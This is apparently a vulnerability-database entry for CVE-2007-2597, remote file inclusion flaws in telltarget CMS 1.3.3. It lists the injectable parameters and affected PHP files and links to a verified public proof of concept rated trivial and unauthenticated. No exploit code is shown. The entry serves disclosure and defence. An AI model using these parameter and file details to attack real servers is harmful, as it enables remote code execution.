CVE-2007-2597

telltarget_cms < 1.3.3 - Remote File Inclusion via Multiple Parameters

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2007-2597. PoCs published by GoLd_M.

AI-analyzed exploit summary The exploit demonstrates multiple remote file inclusion vulnerabilities in telltarget CMS 1.3.3 by manipulating the 'ordnertiefe' and 'tt_docroot' parameters to include arbitrary shell files. The attack leverages improper input validation in PHP scripts to execute remote code.

Description

Multiple PHP remote file inclusion vulnerabilities in telltarget CMS 1.3.3 allow remote attackers to execute arbitrary PHP code via a URL in the (1) ordnertiefe parameter to site_conf.php; or the (2) tt_docroot parameter to (a) class.csv.php, (b) produkte_nach_serie.php, or (c) ref_kd_rubrik.php in functionen/; (d) hg_referenz_jobgalerie.php, (e) surfer_anmeldung_NWL.php, (f) produkte_nach_serie_alle.php, (g) surfer_aendern.php, (h) ref_kd_rubrik.php, or (i) referenz.php in module/; or (j) 1/lay.php or (k) 3/lay.php in standard/.

Exploits (1)

exploitdb WORKING POC VERIFIED

by GoLd_M · textwebappsphp

https://www.exploit-db.com/exploits/3885

View Code ZIP pw:eip

The exploit demonstrates multiple remote file inclusion vulnerabilities in telltarget CMS 1.3.3 by manipulating the 'ordnertiefe' and 'tt_docroot' parameters to include arbitrary shell files. The attack leverages improper input validation in PHP scripts to execute remote code.

Classification

Working Poc 90%

Attack Type

Rce

Complexity

Trivial

Reliability

Reliable

Target: telltarget CMS 1.3.3

No auth needed

Prerequisites: Network access to the target CMS · Ability to host a malicious shell file on a remote server

MITRE ATT&CK